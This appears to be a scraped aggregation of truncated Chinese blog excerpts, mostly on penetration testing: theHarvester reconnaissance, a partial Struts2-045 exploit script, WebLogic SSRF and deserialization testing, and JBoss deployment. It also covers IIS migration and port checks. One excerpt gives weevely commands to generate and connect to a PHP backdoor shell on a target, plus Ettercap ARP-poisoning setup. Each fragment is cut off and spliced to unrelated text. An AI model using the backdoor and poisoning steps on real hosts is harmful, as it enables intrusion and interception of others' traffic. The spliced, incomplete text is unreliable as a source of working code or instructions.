在渗透测试早期阶段,安全人员往往需要从互联网快速获取目标的一些信息,以确认测试目标的概况.为了满足这个需求,Kali Linux提供了theharvester工具.该工具可以搜索引擎.社交网站获取目标相关的信息,如邮件地址.子域名.主机.雇员姓名.开放端口等. 由于要满足用户的快速收集信息的需求,该工具默认会收集尽可能多的信息.用户也可以通过选项,限制搜集信息的范围. 使用方法和下载地址.传送门(http://www.freebuf.com/sectool/37765.html)

0x00   环境 存在struts2-045漏洞的war包 apache-tomcat 0x01   脚本 #coding:utf-8 import re import urllib import urllib2 import linecache url="http://127.0.0.1:8080/struts2-rest-showcase/orders.xhtml" resp=urllib.urlopen(url).read() data=re.compile(r'href=.+

0x001 Win下检测 https://github.com/robertdavidgraham/rdpscan C:\Users\K8team\Desktop\rdpscan-master\vs10\Release 的目录 2019/06/02 02:11 <DIR> . 2019/06/02 02:11 <DIR> .. 2019/06/02 01:55 2,582,016 libcrypto-1_1.dll 2019/06/02 01:57 619,520 libssl-1

0X01 概述 SSRF(Server-Side Request Forgery, 服务端请求伪造)利用漏洞可以发起网络请求来攻击内网服务.利用SSRF能实现以下效果:1)        扫描内网(主机信息收集,Web应用指纹识别)2)        根据所识别应用发送构造的Payload进行攻击3)        Denial of service(请求大文件,始终保持连接Keep-Alive Always) 0X02 vulhub weblogic SSRF 漏洞复现 环境搭建 下载vulh

&amp;amp;lt;img src="http://image.3001.net/images/20140928/14118931103311.jpg!small" title="shellshock-bug-bash-bashbug-938x535.jpg"/&amp;amp;gt;&amp;amp;lt;/strong&amp;amp;gt;&amp;amp;lt;/span&amp;amp;gt;&a

IIS6.0有个导出配置的功能,但你却找不到界面上的直接导入配置功能,需要用到操作系统自带的iiscnfg.vbs脚本. 1.导出当前的IIS网站配置 打开Internet信息服务(IIS)--->右键“网站”--->“所有任务”--->弹出的保存窗口,填写文件名和路径,将IIS的配置保存一份.     然后,将这份备份,上传到另一台服务器上,比如我放在迁移服务器的d:\iisbak.xml 下面开始在迁移服务器上做还原操作了: 2.导入配置文件 “开始”---“运行”---输入“cmd

[视频]K8飞刀 HackerIE自动检测网站注入教程 https://pan.baidu.com/s/1c08rihi

一.说明 在JBoss服务器上部署web应用程序,有很多不同的方式,诸如:JMX Console.Remote Method Invocation(RMI).JMXInvokerServlet.HttpAdapter等.根据内网测试的需求,写了一段代码,代码逻辑看注释. 二.代码实现 读取带有IP的文本内容,如果有端口以冒号(:)分隔,那就默认将该端口当成WEB端口.如果只有IP,那么就把端口设定为默认的80. Python代码: #!/usr/bin/env python # coding=u

引子 在 批量下载网站图片的Python实用小工具 一文中,讲解了开发一个Python小工具来实现网站图片的并发批量拉取.不过那个工具仅限于特定网站的特定规则,本文将基于其代码实现,开发一个更加通用的图片下载工具. 通用版 思路 我们可以做成一个下载图片资源的通用框架: 制定生成网页资源的规则集合 PageRules: 根据 PageRules 抓取网站的网页内容集合 PageContents: 制定从网页内容集合 PageContents 获取资源真实地址的规则集合或路径集合 Resource

1.要下载的页面 http://www.howsoftworks.net/javaapi/ 2. 下载Teleport Ultra 3.使用Teleport Ultra批量克隆网站 4.下载Easy CHM 5.使用Easy CHM合并生成chm文件

~ 以下内容,仅供学习参考 ~ weblogic 反序列化补丁绕过漏洞已经出了两个月了,balabala ~~~ 废话不说,拿到该漏洞的利用工具weblogic.jar,但只能一个个检测ip和端口,效率有点低 ~  而我自己又没有能力去重写一个批量检测工具,于是乎就想能不能通过一些非技术手段 ~ 先看下该工具的使用方法: starnight:shell starnight$ java -jar weblogic.jar usage: supeream -B Runtime Blind Execu

Chrome好用的插件:Wappalyzer 检测网站使用的技术 Wappalyzer是一款能够分析目标网站所采用的平台架构.网站环境.服务器配置环境.javascript框架.编程语言等参数的chrome网站技术分析插件. 这是一个很好用的插件,可以快速查看网站用了什么框架.比如说,Wappalyzer的官网. 再比如说百度 还有个同类型的工具 WhatRuns ,这个工具有时候可以检测到Wappalyzer不能检测的网站.比如说 掘金 用Wappalyzer 用WhatRuns 类似的工具

今天使用python+pycurl来检测网站性能,使用curl_obj.getinfo(pycurl.*_TIME)来获取各个阶段运行时间 total_time = curl_obj.getinfo(pycurl.TOTAL_TIME) #传输结束所消耗的总时间 dns_time = curl_obj.getinfo(pycurl.NAMELOOKUP_TIME) #从发起请求到DNS解析完成所消耗的时间 connect_time = curl_obj.getinfo(pycurl.CONNEC

socket函数 简述 socket又称套间字或者插口,是网络通信中必不可少的工具.有道是:"无socket,不网络".由于socket最早在BSD Unix上使用,而Unix/Linux所奉为经典的至高哲学是"一切皆是文件".因此socket在使用时也是完全符合这个哲学的,它涉及到listen().bind().accept().write()/read().close()等基本的类似于文件操作的功能函数. socket用法 import socket socke

持久性后门 生成PHP shell weevely generate 密码 /root/Desktop/404.php 靶机IP/404.php weevely http://192.168.1.108/404.php 密码 下一步就是命令与执行了,比如ls Ettercap之ARP中毒 sysctl -w net.ipv4.ip_forward=1 图形版ettercap target1 添加路由 网关地址 target2 添加路由 蓝方地址 tcpdump -i eth0 -n port 8

批量检测端口通信: 准备文件树状图 telnet.sh 脚本内容如下: 文件说明 telnet_alive.txt  : 活动的端口 telnet_die.txt    :  离线的端口 telnet_result.txt  :  活动端口返回信息 telnet_info.txt     :  要查询的iP端口地址 telnet.sh            : telnet 查询IP的脚本 telnet.sh 的详细信息: #!/bin/bash BASEDIR=`dirname $0`BASE

一.nc命令检测端口的用法 # nc -v -w 10 %IP% -z %PORT% -v 显示指令执行过程. -w <超时秒数> 设置等待连线的时间. -u 表示使用UDP协议 -z 使用0输入/输出模式,只在扫描通信端口时使用. 例如:检测192.168.0.180(这里的IP地址也可以换成域名A记录形式,如换成www.baidu.com)这台服务器的80端口和81端口 如果开放,则结果为succeeded,如下: [root@localhost ~]# nc -v -w 10 -z 19

shell批量监控网站状态码脚本,使用curl很慢.等我学完其他方式,在来更新. #!/bin/bash #GuoYabin yuming=`/bin/cat yuming.txt` for i in $yuming do result=`/usr/bin/curl -I $i 2>/dev/null|awk '/HTTP/{print $2}'` res=$[result+1] #这个方法很烂,浮点数要过滤成整数. res=`echo $res |awk -F '.' '{print $1}'

定位 本文适合于熟悉Python编程且对互联网高清图片饶有兴趣的筒鞋.读完本文后,将学会如何使用Python库批量并发地抓取网页和下载图片资源.只要懂得如何安装Python库以及运行Python程序,就能使用本文给出的程序批量下载指定图片啦!   在网上冲浪的时候,总有些“小浪花”令人喜悦.没错,小浪花就是美图啦.边浏览边下载,自然是不错的:不过,好花不常开,好景不常在,想要便捷地保存下来,一个个地另存为还是很麻烦的.能不能批量下载呢? 目标  太平洋摄影网, 一个不错的摄影网站. 如果你喜欢自

使用 cmd 运行如下命令 > %windir%\system32\inetsrv\appcmd list site /config /xml > d:\sites.xml 修改 d 盘 下的 sites.xml 文件 包括批量新增的网站项目 在 cmd 中 使用如下命令导入 > %windir%\system32\inetsrv\appcmd add site /in < d:\sites.xml 在 cmd 中 使用 如下命令重启IIS > iisreset 刷新你的 i

http://se.360.cn/v5/iecoretest.html 该网站能有效检测您浏览器的内核,以及版本,操作系统. 找到这个网址,是因为最近解决WebBrowser自动调节IE版本功能时发现的. 效果图如下